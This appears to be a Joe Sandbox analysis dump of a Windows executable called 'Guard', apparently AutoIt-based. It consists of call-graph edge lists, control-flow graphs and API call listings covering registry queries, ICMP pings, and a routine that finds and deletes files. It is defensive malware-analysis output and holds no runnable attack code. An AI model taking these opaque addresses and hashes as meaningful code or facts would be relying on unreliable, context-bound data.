100278->100279 100280 6c3094 100279->100280 100306 6d08c1 100280->100306 100283 6c1900 59 API calls 100284 6c30ad 100283->100284 100285 6c4c94 59 API calls 100284->100285 100286 6c30bc 100285->100286 100287 6c1207 59 API calls 100286->100287 100288 6c30c5 100287->100288 100289 6c19e1 59 API calls 100288->100289 100290 6c30ce RegOpenKeyExW 100289->100290 100291 7001a3 RegQueryValueExW 100290->100291 100296 6c30f0 Mailbox 100290->100296 100292 7001c0 100291->100292 100293 700235 RegCloseKey 100291->100293 100294 6d0fe6 Mailbox 59 API calls 100292->100294 100293->100296 100298 700247 _wcscat Mailbox __wsetenvp 100293->100298 100295 7001d9 100294->100295 100297 6c433f 59 API calls 100295->100297 100296->100272 100299 7001e4 RegQueryValueExW 100297->100299 100298->100296 100300 6c1609 59 API calls 100298->100300 100304 6c1a36 59 API calls 100298->100304 100305 6c4c94 59 API calls 100298->100305 100301 700201 100299->100301 100302 70021b 100299->100302 100300->100298 100303 6c1821 59 API calls 100301->100303 100302->100293 100303->100302 100304->100298 100305->100298 100307 6e1b70 __ftell_nolock 100306->100307 100308 6d08ce GetFullPathNameW 100307->100308 100309 6d08f0 100308->100309 100310 6c1821 59 API calls 100309->100310 100311 6c309f 100310->100311 100311->100283 100312 6f01f8 100313 6f01fa 100312->100313 100316 714d18 SHGetFolderPathW 100313->100316 100317 6c1821 59 API calls 100316->100317 100318 6f0203 100317->100318 100319 6b1016 100324 6c5ce7 100319->100324 100322 6d2f70 __cinit 67 API calls 100323 6b1025 100322->100323 100325 6d0fe6 Mailbox 59 API calls 100324->100325 100326 6c5cef 100325->100326 100327 6b101b 100326->100327 100331 6c5f39 100326->100331 100327->100322 100332 6c5cfb 100331->100332 100333 6c5f42 100331->100333 100335 6c5d13 100332->100335 100334 6d2f70 __cinit 67 API calls 100333->100334 100334->100332 100336 6c1207 59 API calls 100335->100336 100337 6c5d2b GetVersionExW 100336->100337 100338 6c1821 59 API calls 100337->100338 100339 6c5d6e 100338->100339 100340 6c1981 59 API calls 100339->100340 100345 6c5d9b 100339->100345 100341 6c5d8f 100340->100341 100342 6c133d 59 API calls 100341->100342 100342->100345 100343 6c5e00 GetCurrentProcess IsWow64Process 100344 6c5e19 100343->100344 100347 6c5e2f 100344->100347 100348 6c5e98 GetSystemInfo 100344->100348 100345->100343 100346 701098 100345->100346 100359 6c55f0 100347->100359 100350 6c5e65 100348->100350 100350->100327 100352 6c5e8c GetSystemInfo 100355 6c5e56 100352->100355 100353 6c5e41 100354 6c55f0 2 API calls 100353->100354 100357 6c5e49 GetNativeSystemInfo 100354->100357 100355->100350 100356 6c5e5c FreeLibrary 100355->100356 100356->100350 100357->100355 100360 6c5619 100359->100360 100361 6c55f9 LoadLibraryA 100359->100361 100360->100352 100360->100353 100361->100360 100362 6c560a GetProcAddress 100361->100362 100362->100360 100363 6b1055 100368 6b2a19 100363->100368 100366 6d2f70 __cinit 67 API calls 100367 6b1064 100366->100367 100369 6c1207 59 API calls 100368->100369 100370 6b2a87 100369->100370 100375 6b1256 100370->100375 100373 6b2b24 100374 6b105a 100373->100374 100378 6b13f8 59 API calls 2 library calls 100373->100378 100374->100366 100379 6b1284 100375->100379 100378->100373 100380 6b1275 100379->100380 100381 6b1291 100379->100381 100380->100373 100381->100380 100382 6b1298 RegOpenKeyExW 100381->100382 100382->100380 100383 6b12b2 RegQueryValueExW 100382->100383 100384 6b12e8 RegCloseKey 100383->100384 100385 6b12d3 100383->100385 100384->100380 100385->100384 100386 6b5ff5 100409 6b5ede Mailbox _memmove 100386->100409 100387 6d0fe6 59 API calls Mailbox 100387->100409 100388 6b6a9b 100600 6ba9de 291 API calls 100388->100600 100390 6b53b0 291 API calls 100390->100409 100391 6eeff9 100392 6b5190 Mailbox 59 API calls 100391->100392 100397 6eefeb 100392->100397 100393 6ef007 100613 71a48d 89 API calls 4 library calls 100393->100613 100444 6b5569 Mailbox 100397->100444 100612 706cf1 59 API calls Mailbox 100397->100612 100398 6b60e5 100399 6ee137 100398->100399 100403 6b63bd Mailbox 100398->100403 100414 6b6abc 100398->100414 100421 6b6152 Mailbox 100398->100421 100399->100403 100601 707aad 59 API calls 100399->100601 100400 6c1c9c 59 API calls 100400->100409 100402 6c1a36 59 API calls 100402->100409 100405 6d0fe6 Mailbox 59 API calls 100403->100405 100416 6b6426 100403->100416 100407 6b63d1 100405->100407 100410 6b63de 100407->100410 100407->100414 100409->100387 100409->100388 100409->100390 100409->100391 100409->100393 100409->100398 100409->100400 100409->100402 100409->100414 100409->100444 100599 6b523c 59 API calls 100409->100599 100604 717f11 59 API calls Mailbox 100409->100604 100605 72c355 291 API calls Mailbox 100409->100605 100606 706cf1 59 API calls Mailbox 100409->100606 100411 6b6413 100410->100411 100412 6ee172 100410->100412 100411->100416 100443 6b5447 Mailbox 100411->100443 100602 72c87c 85 API calls 2 library calls 100412->100602 100611 71a48d 89 API calls 4 library calls 100414->100611 100603 72c9c9 95 API calls Mailbox 100416->100603 100419 6ee19d 100419->100419 100420 6d0fe6 59 API calls Mailbox 100420->100443 100421->100397 100421->100414 100424 6b5190 Mailbox 59 API calls 100421->100424 100436 6ee2e9 VariantClear 100421->100436 100421->100444 100450 6c42cf CloseHandle 100421->100450 100455 72e60c 129 API calls 100421->100455 100458 6bd679 100421->100458 100498 71412a 100421->100498 100501 72495b 100421->100501 100510 71413a 100421->100510 100513 725e1d 100421->100513 100538 72f1b2 100421->100538 100543 71d6be 100421->100543 100588 724b25 100421->100588 100607 707aad 59 API calls 100421->100607 100422 6ef165 100615 71a48d 89 API calls 4 library calls 100422->100615 100423 6ee691 100608 71a48d 89 API calls 4 library calls 100423->100608 100424->100421 100427 6b69fa 100434 6c1c9c 59 API calls 100427->100434 100429 6b5a1a 100614 71a48d 89 API calls 4 library calls 100429->100614 100430 6c1c9c 59 API calls 100430->100443 100431 6ee6a0 100432 6eea9a 100437 6c1c9c 59 API calls 100432->100437 100433 6b69ff 100433->100422 100433->100423 100434->100444 100436->100421 100437->100444 100439 6c1207 59 API calls 100439->100443 100440 707aad 59 API calls 100440->100443 100441 6eeb67 100441->100444 100609 707aad 59 API calls 100441->100609 100443->100420 100443->100423 100443->100427 100443->100429 100443->100430 100443->100432 100443->100433 100443->100439 100443->100440 100443->100441 100443->100444 100445 6d2f70 67 API calls __cinit 100443->100445 100446 6eef28 100443->100446 100597 6b7e50 291 API calls 2 library calls 100443->100597 100598 6b6e30 60 API calls Mailbox 100443->100598 100445->100443 100610 71a48d 89 API calls 4 library calls 100446->100610 100450->100421 100455->100421 100616 6b4f98 100458->100616 100462 6d0fe6 Mailbox 59 API calls 100463 6bd6aa 100462->100463 100466 6bd6ba 100463->100466 100467 6c3df7 60 API calls 100463->100467 100464 6bd6df 100469 6b502b 59 API calls 100464->100469 100474 6bd6ec 100464->100474 100465 6f5068 100465->100464 100663 71fbb7 59 API calls 100465->100663 100468 6b4d37 84 API calls 100466->100468 100467->100466 100470 6bd6c8 100468->100470 100471 6f50b0 100469->100471 100472 6c3e47 67 API calls 100470->100472 100471->100474 100475 6f50b8 100471->100475 100473 6bd6d7 100472->100473 100473->100464 100473->100465 100662 6c3f0b CloseHandle 100473->100662 100476 6c41d6 2 API calls 100474->100476 100477 6b502b 59 API calls 100475->100477 100479 6bd6f3 100476->100479 100477->100479 100480 6f50ca 100479->100480 100481 6bd70d 100479->100481 100483 6d0fe6 Mailbox 59 API calls 100480->100483 100482 6c1207 59 API calls 100481->100482 100484 6bd715 100482->100484 100485 6f50d0 100483->100485 100629 6c3bc3 100484->100629 100486 6f50e4 100485->100486 100488 6c3ea1 2 API calls 100485->100488 100492 6f50e8 _memmove 100486->100492 100652 717c7f 100486->100652 100488->100486 100490 6bd724 100491 6b4f3c 59 API calls 100490->100491 100490->100492 100493 6bd738 Mailbox 100491->100493 100492->100492 100494 6bd772 100493->100494 100495 6c42cf CloseHandle 100493->100495 100494->100421 100496 6bd766 100495->100496 100496->100494 100661 6c3f0b CloseHandle 100496->100661 100687 71494a GetFileAttributesW 100498->100687 100502 6d0fe6 Mailbox 59 API calls 100501->100502 100503 72496c 100502->100503 100504 6c433f 59 API calls 100503->100504 100505 724976 100504->100505 100506 6b4d37 84 API calls 100505->100506 100507 72498d GetEnvironmentVariableW 100506->100507 100691 717a51 59 API calls Mailbox 100507->100691 100509 7249aa 100509->100421 100511 71494a 3 API calls 100510->100511 100512 71413f 100511->100512 100512->100421 100514 725e46 100513->100514 100515 725e74 WSAStartup 100514->100515 100516 6b502b 59 API calls 100514->100516 100517 725e9d 100515->100517 100527 725e88 Mailbox 100515->100527 100519 725e61 100516->100519 100518 6c40cd 59 API calls 100517->100518 100520 725ea6 100518->100520 100519->100515 100522 6b502b 59 API calls 100519->100522 100521 6b4d37 84 API calls 100520->100521 100523 725eb2 100521->100523 100524 725e70 100522->100524 100525 6c402a 61 API calls 100523->100525 100524->100515 100526 725ebf inet_addr gethostbyname 100525->100526 100526->100527 100528 725edd IcmpCreateFile 100526->100528 100527->100421 100528->100527 100529 725f01 100528->100529 100530 6d0fe6 Mailbox 59 API calls 100529->100530 100531 725f1a 100530->100531 100532 6c433f 59 API calls 100531->100532 100533 725f25 100532->100533 100534 725f34 IcmpSendEcho 100533->100534 100535 725f55 IcmpSendEcho 100533->100535 100536 725f6d 100534->100536 100535->100536 100537 725fd4 IcmpCloseHandle WSACleanup 100536->100537 100537->100527 100539 6b4d37 84 API calls 100538->100539 100540 72f1cf 100539->100540 100541 714148 66 API calls 100540->100541 100542 72f1de 100541->100542 100542->100421 100544 71d6dd 100543->100544 100545 71d6e8 100543->100545 100546 6b502b 59 API calls 100544->100546 100549 6c1207 59 API calls 100545->100549 100586 71d7c2 Mailbox 100545->100586 100546->100545 100547 6d0fe6 Mailbox 59 API calls 100548 71d80b 100547->100548 100550 71d817 100548->100550 100552 6c3df7 60 API calls 100548->100552 100551 71d70c 100549->100551 100554 6b4d37 84 API calls 100550->100554 100553 6c1207 59 API calls 100551->100553 100552->100550 100555 71d715 100553->100555 100556 71d82f 100554->100556 100557 6b4d37 84 API calls 100555->100557 100558 6c3e47 67 API calls 100556->100558 100559 71d721 100557->100559 100560 71d83e 100558->100560 100561 6d0119 59 API calls 100559->100561 100562 71d842 GetLastError 100560->100562 100563 71d876 100560->100563 100564 71d736 100561->100564 100566 71d85b 100562->100566 100568 71d8a1 100563->100568 100569 71d8d8 100563->100569 100565 6c17e0 59 API calls 100564->100565 100567 71d769 100565->100567 100583 71d7cb Mailbox 100566->100583 100704 6c3f0b CloseHandle 100566->100704 100574 71412a 3 API calls 100567->100574 100587 71d793 Mailbox 100567->100587 100571 6d0fe6 Mailbox 59 API calls 100568->100571 100570 6d0fe6 Mailbox 59 API calls 100569->100570 100575 71d8dd 100570->100575 100576 71d8a6 100571->100576 100573 6b502b 59 API calls 100573->100586 100577 71d779 100574->100577 100579 6c1207 59 API calls 100575->100579 100575->100583 100578 71d8b7 100576->100578 100580 6c1207 59 API calls 100576->100580 100582 6c1a36 59 API calls 100577->100582 100577->100587 100705 71fc0d 59 API calls 2 library calls 100578->100705 100579->100583 100580->100578 100584 71d78a 100582->100584 100583->100421 100692 713f1d 100584->100692 100586->100547 100586->100583 100587->100573 100589 6b4d37 84 API calls 100588->100589 100590 724b5f 100589->100590 100591 6c20e0 94 API calls 100590->100591 100592 724b6f 100591->100592 100593 724b94 100592->100593 100594 6b53b0 291 API calls 100592->100594 100595 6b4f98 59 API calls 100593->100595 100596 724b98 100593->100596 100594->100593 100595->100596 100596->100421 100597->100443 100598->100443 100599->100409 100600->100414 100601->100403 100602->100416 100603->100419 100604->100409 100605->100409 100606->100409 100607->100421 100608->100431 100609->100444 100610->100429 100611->100397 100612->100444 100613->100397 100614->100444 100615->100444 100617 6edd2b 100616->100617 100618 6b4fa8 100616->100618 100619 6edd3c 100617->100619 100621 6c1821 59 API calls 100617->100621 100623 6d0fe6 Mailbox 59 API calls 100618->100623 100620 6c19e1 59 API calls 100619->100620 100622 6edd46 100620->100622 100621->100619 100626 6b4fd4 100622->100626 100627 6c1207 59 API calls 100622->100627 100624 6b4fbb 100623->100624 100624->100622 100625 6b4fc6 100624->100625 100625->100626 100628 6c1a36 59 API calls 100625->100628 100626->100462 100626->100465 100627->100626 100628->100626 100630 6c3bce 100629->100630 100631 6c3bf3 100629->100631 100630->100631 100633 6c3bdd 100630->100633 100632 6c19e1 59 API calls 100631->100632 100638 713751 100632->100638 100635 6c3b7b 100633->100635 100637 6c3bed 100633->100637 100634 713780 100634->100490 100639 6c40cd 59 API calls 100635->100639 100640 6c40cd 59 API calls 100637->100640 100638->100634 100670 7136ed ReadFile SetFilePointerEx 100638->100670 100671 6c153b 59 API calls 2 library calls 100638->100671 100641 6c3b8d 100639->100641 100643 713871 100640->100643 100664 6c3b23 100641->100664 100646 6c3b23 61 API calls 100643->100646 100647 71387f 100646->100647 100651 71388f Mailbox 100647->100651 100672 6c13f1 61 API calls Mailbox 100647->100672 100648 6c124d 61 API calls 100650 6c3bab Mailbox 100648->100650 100650->100490 100651->100490 100653 717c8a 100652->100653 100654 6d0fe6 Mailbox 59 API calls 100653->100654 100655 717c91 100654->100655 100656 717c9d 100655->100656 100657 717cbe 100655->100657 100658 6d0fe6 Mailbox 59 API calls 100656->100658 100659 6d0fe6 Mailbox 59 API calls 100657->100659 100660 717ca6 _memset 100658->100660 100659->100660 100660->100492 100661->100494 100662->100465 100663->100465 100665 6c3f20 59 API calls 100664->100665 100669 6c3b34 100665->100669 100666 6c4220 2 API calls 100666->100669 100668 6c3b65 100668->100648 100668->100650 100669->100666 100669->100668 100673 6c408f 100669->100673 100670->100638 100671->100638 100672->100651 100674 700692 100673->100674 100675 6c40a3 100673->100675 100676 6c1c7e 59 API calls 100674->100676 100682 6c3fce 100675->100682 100679 70069d 100676->100679 100678 6c40af 100678->100669 100680 6d0fe6 Mailbox 59 API calls 100679->100680 100681 7006b2 _memmove 100680->100681 100683 6c3fe6 100682->100683 100686 6c3fdf _memmove 100682->100686 100684 6d0fe6 Mailbox 59 API calls 100683->100684 100685 700622 100683->100685 100684->100686 100686->100678 100688 714131 100687->100688 100689 714965 FindFirstFileW 100687->100689 100688->100421 100689->100688 100690 71497a FindClose 100689->100690 100690->100688 100691->100509 100693 6c133d 59 API calls 100692->100693 100694 713f52 GetFileAttributesW 100693->100694 100695 713f66 GetLastError 100694->100695 100697 713f7f Mailbox 100694->100697 100696 713f73 CreateDirectoryW 100695->100696 100698 713f81 100695->100698 100696->100697 100696->100698 100697->100587 100698->100697 100699 6c1981 59 API calls 100698->100699 100700 713fc3 100699->100700 100701 713f1d 59 API calls 100700->100701 100702 713fcc 100701->100702 100702->100697 100703 713fd0 CreateDirectoryW 100702->100703 100703->100697 100704->100583 100705->100583

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1527 714005-71404c call 6c1207 * 3 call 6d0284 call 714fec 1538 71405c-71408d call 6d0119 FindFirstFileW 1527->1538 1539 71404e-714057 call 6c1900 1527->1539 1543 7140fc-714103 FindClose 1538->1543 1544 71408f-714091 1538->1544 1539->1538 1545 714107-714129 call 6c1cb6 * 3 1543->1545 1544->1543 1546 714093-714098 1544->1546 1548 7140d7-7140e9 FindNextFileW 1546->1548 1549 71409a-7140d5 call 6c1c9c call 6c17e0 call 6c1900 DeleteFileW 1546->1549 1548->1544 1552 7140eb-7140f1 1548->1552 1549->1548 1562 7140f3-7140fa FindClose 1549->1562 1552->1544 1562->1545
                                                                      APIs
                                                                        • Part of subcall function 006D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006C2A58,?,00008000), ref: 006D02A4
                                                                        • Part of subcall function 00714FEC: GetFileAttributesW.KERNEL32(?,00713BFE), ref: 00714FED
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0071407C
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 007140CC
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 007140DD
                                                                      • FindClose.KERNEL32(00000000), ref: 007140F4
                                                                      • FindClose.KERNEL32(00000000), ref: 007140FD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: 0c07ccfb34861574528b539fae33e7745fe9e8eda613376b717b55217b0e9792
                                                                      • Instruction ID: 5c1fafdb0c8d87f5305d2e94b0625f7ad6580deef411d66d5bf1844fc0e1e2df
                                                                      • Opcode Fuzzy Hash: 0c07ccfb34861574528b539fae33e7745fe9e8eda613376b717b55217b0e9792
                                                                      • Instruction Fuzzy Hash: 09316F350083859BC340EB64C895DEFB7A9BE97304F444A1DF5D1861D2DB38DA49C7AA
                                                                      APIs
                                                                        • Part of subcall function 006C3740: CharUpperBuffW.USER32(?,007771DC,00000000,?,00000000,007771DC,?,006B53A5,?,?,?,?), ref: 006C375D
                                                                      • _memmove.LIBCMT ref: 006BB68A
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper_memmove
                                                                      • String ID:
                                                                      • API String ID: 2819905725-0
                                                                      • Opcode ID: 0e1ee0530e55558b49f502f595136bdbee584d069a4bfbb0749f93f8988ca17d
                                                                      • Instruction ID: 1db03557352b3957d54c752a4a8f00b2665b6ad8726d8a0919eb7f78e8e9c277
                                                                      • Opcode Fuzzy Hash: 0e1ee0530e55558b49f502f595136bdbee584d069a4bfbb0749f93f8988ca17d
                                                                      • Instruction Fuzzy Hash: 1DA27DB05083519FD720DF18C480BAAB7E2FF85304F14995DE99A8B352DBB1ED86CB52
                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,006FFC86), ref: 0071495A
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0071496B
                                                                      • FindClose.KERNEL32(00000000), ref: 0071497B
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                      • String ID:
                                                                      • API String ID: 48322524-0
                                                                      • Opcode ID: 252f1fc558daf7ddd133f69688041273c072cfacad1ae561bc81900399f58985
                                                                      • Instruction ID: 37b69acaf537f63a080d1ebb61e79d2bbbc7097f09871c480d13315dbbf017cf
                                                                      • Opcode Fuzzy Hash: 252f1fc558daf7ddd133f69688041273c072cfacad1ae561bc81900399f58985
                                                                      • Instruction Fuzzy Hash: 1BE0D8354105099B4310673CEC0D4EE775CAE07339F104706FA35C10D0E778A98446D9

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 567 6c27fc-6c280d call 6d0fe6 569 6c2812-6c2828 call 6d0fe6 567->569 572 6c282e-6c2837 569->572 573 6c29a4 569->573 574 6c2839-6c283b 572->574 575 6c2862-6c2874 call 6d39fb 572->575 577 6c29ac-6c29b1 573->577 576 6c283c 574->576 575->576 582 6c2876-6c2888 call 6d39fb 575->582 579 6c283e 576->579 577->576 581 6c2840-6c2845 579->581 583 6c2857-6c285f 581->583 584 6c2847-6c2856 call 6d105c * 2 581->584 582->577 589 6c288e-6c28a0 call 6d39fb 582->589 584->583 594 6ffb5b-6ffb61 589->594 595 6c28a6-6c28b8 call 6d39fb 589->595 594->576 598 6c28be-6c28d0 call 6d39fb 595->598 599 6ffb66-6ffb9d call 6c436a call 6c2e8f call 6c2edc call 6d2e2c 595->599 604 6ffc2a-6ffc35 598->604 605 6c28d6-6c28e8 call 6d39fb 598->605 629 6ffb9f-6ffbaa 599->629 630 6ffbdd-6ffbe0 599->630 604->576 609 6ffc3b-6ffc4f call 6c151f 604->609 614 6c28ee-6c2900 call 6d39fb 605->614 615 6ffc75-6ffc88 call 7102fc 605->615 620 6ffc5f-6ffc67 609->620 621 6ffc51-6ffc58 609->621 631 6c291a 614->631 632 6c2902-6c2914 call 6d39fb 614->632 627 6ffc8a-6ffcd6 call 6c1a36 * 2 call 6c2f3d call 6c29be call 6c1cb6 * 2 615->627 628 6ffce4-6ffcec 615->628 620->576 622 6ffc6d-6ffc70 620->622 621->609 626 6ffc5a 621->626 622->579 626->576 627->579 682 6ffcdc-6ffcdf 627->682 634 6ffd02-6ffd0f call 70ff5c 628->634 629->630 636 6ffbac-6ffbb3 629->636 637 6ffc06-6ffc17 630->637 638 6ffbe2-6ffc01 call 6d105c call 70ff5c 630->638 633 6c291d-6c2929 call 6c3ebe 631->633 632->581 632->631 655 6ffcee-6ffcf3 633->655 656 6c292f-6c2952 call 6c2edc call 6c2e8f call 6d39fb 633->656 634->579 645 6ffbcb-6ffbd8 call 6d105c 636->645 646 6ffbb5-6ffbb9 636->646 649 6ffc1c-6ffc25 call 6d105c 637->649 638->576 666 6ffcff 645->666 646->645 652 6ffbbb-6ffbc9 646->652 649->576 652->649 655->581 661 6ffcf9-6ffcfa 655->661 677 6c2954-6c2966 call 6d39fb 656->677 678 6c29b6-6c29b9 656->678 661->666 666->634 677->678 684 6c2968-6c297a call 6d39fb 677->684 678->633 682->579 687 6c297c-6c298e call 6d39fb 684->687 688 6c2990-6c2999 684->688 687->633 687->688 688->581 690 6c299f 688->690 690->633
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                      • API String ID: 2660009612-1645009161
                                                                      • Opcode ID: a56990fa99544ca7b6a9f8a6f735dc1392ba9b9e7e51769d3f62529ec0eaaf05
                                                                      • Instruction ID: e2432b10cc56edc24a6aa6dcf0dc88145b1e214546cec0b2721f2ec59bac29f3
                                                                      • Opcode Fuzzy Hash: a56990fa99544ca7b6a9f8a6f735dc1392ba9b9e7e51769d3f62529ec0eaaf05
                                                                      • Instruction Fuzzy Hash: EEA1A070A4020ABBCB20AF21DC62FBE776AEF45740F14002DFD05AB392EBB19A55D755

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 972 6c29be-6c29e1 973 6ffd14-6ffd27 call 70ff5c 972->973 974 6c29e7-6c2a19 call 6c3df7 call 6c3e47 972->974 980 6ffd2e-6ffd43 call 70ff5c 973->980 981 6c2a1e-6c2a20 974->981 988 6ffd48-6ffd50 980->988 981->980 982 6c2a26-6c2a9b call 6c1207 call 6d0b8b call 6c1207 call 6d0284 call 6c3ea1 call 6c410a 981->982 982->988 991 6c2aa1-6c2b10 call 6c1207 * 2 call 6d0119 call 6c17e0 SetCurrentDirectoryW call 6c1cb6 * 2 call 6d0fe6 call 6c433f 982->991 990 6ffd56-6ffd80 call 6c42cf call 6c49c2 988->990 988->991 1006 6ffda3-6ffdba call 70ff5c 990->1006 1007 6ffd82-6ffd9c call 719b16 990->1007 1046 6c2b14-6c2b19 991->1046 1019 6c2c4c-6c2c7e call 6c1cb6 * 2 call 6c3e25 1006->1019 1016 6ffdbf-6ffe01 call 6c4a2f call 6d0fe6 1007->1016 1017 6ffd9e call 6c4a2f 1007->1017 1036 6ffe14-6ffe16 1016->1036 1037 6ffe03-6ffe12 1016->1037 1017->1006 1040 6ffe1a-6ffe52 call 6c3613 call 6c343f 1036->1040 1037->1040 1051 700032-70006a call 6c3613 call 71789a call 71fc0d call 6d2f85 1040->1051 1052 6ffe58 1040->1052 1048 6c2b1f-6c2b2f call 6c3ebe 1046->1048 1049 6c2c19-6c2c3c call 6c42cf SetCurrentDirectoryW 1046->1049 1048->1049 1058 6c2b35-6c2b51 call 6c2e8f call 6c2dfe 1048->1058 1049->1019 1061 6c2c3e-6c2c4b call 6d105c * 2 1049->1061 1091 70006c-70007f call 6c3546 call 7071dc 1051->1091 1056 6ffe5c-6ffe87 call 6c3613 call 7179a4 1052->1056 1077 6ffe89-6ffe9c 1056->1077 1078 6ffea1-6ffeac call 71798e 1056->1078 1079 7000d0-7000e8 call 70ff5c 1058->1079 1080 6c2b57-6c2b6e call 6c2edc call 6d2e2c 1058->1080 1061->1019 1082 6fffc1 1077->1082 1092 6ffeae-6ffec8 1078->1092 1093 6ffecd-6ffed8 call 717978 1078->1093 1079->1049 1107 6c2b8d-6c2b92 1080->1107 1108 6c2b70-6c2b87 call 6d386d 1080->1108 1084 6fffc5-6fffdc call 6c343f 1082->1084 1084->1056 1100 6fffe2-6fffe8 1084->1100 1091->1019 1092->1082 1103 6ffeda-6ffeed 1093->1103 1104 6ffef2-6ffefd call 6c368b 1093->1104 1105 6fffea-6ffff5 1100->1105 1106 700018-70001a call 71045f 1100->1106 1103->1082 1104->1084 1124 6fff03-6fff1d call 70fef8 1104->1124 1105->1106 1114 6ffff7-700016 call 6c314d 1105->1114 1117 70001f-70002c 1106->1117 1111 7000c3-7000cb call 70fdb2 1107->1111 1112 6c2b98-6c2bc0 call 6c1a36 call 6c27fc 1107->1112 1108->1107 1127 6c2c81-6c2c8b 1108->1127 1111->1079 1131 6c2bc5-6c2bd8 call 6c1cb6 1112->1131 1114->1117 1117->1051 1117->1052 1135 6fff1f-6fff4a call 6c1a36 call 6c1cb6 1124->1135 1136 6fff4c-6fff4f 1124->1136 1127->1107 1130 6c2c91-7000be 1127->1130 1130->1107 1142 6c2cac-6c2cb0 1131->1142 1143 6c2bde-6c2be1 1131->1143 1174 6fff70-6fff81 call 6c3613 1135->1174 1137 6fff83-6fff86 1136->1137 1138 6fff51-6fff6f call 6c1a36 call 6c2759 call 6c1cb6 1136->1138 1145 6fffaa-6fffae call 71793a 1137->1145 1146 6fff88-6fff91 call 70fe19 1137->1146 1138->1174 1147 6c2c9f-6c2ca7 1142->1147 1143->1147 1150 6c2be7-6c2bea 1143->1150 1154 6fffb3-6fffc0 call 6d105c 1145->1154 1164 700084-7000b0 call 70ff5c call 6d105c call 6d2f85 1146->1164 1165 6fff97-6fffa5 call 6d105c 1146->1165 1152 6c2c04-6c2c13 1147->1152 1155 6c2c96-6c2c99 1150->1155 1156 6c2bf0-6c2bff call 6c314d 1150->1156 1152->1046 1152->1049 1154->1082 1155->1147 1163 6c2c9b 1155->1163 1156->1152 1163->1147 1164->1091 1165->1056 1174->1154
                                                                      APIs
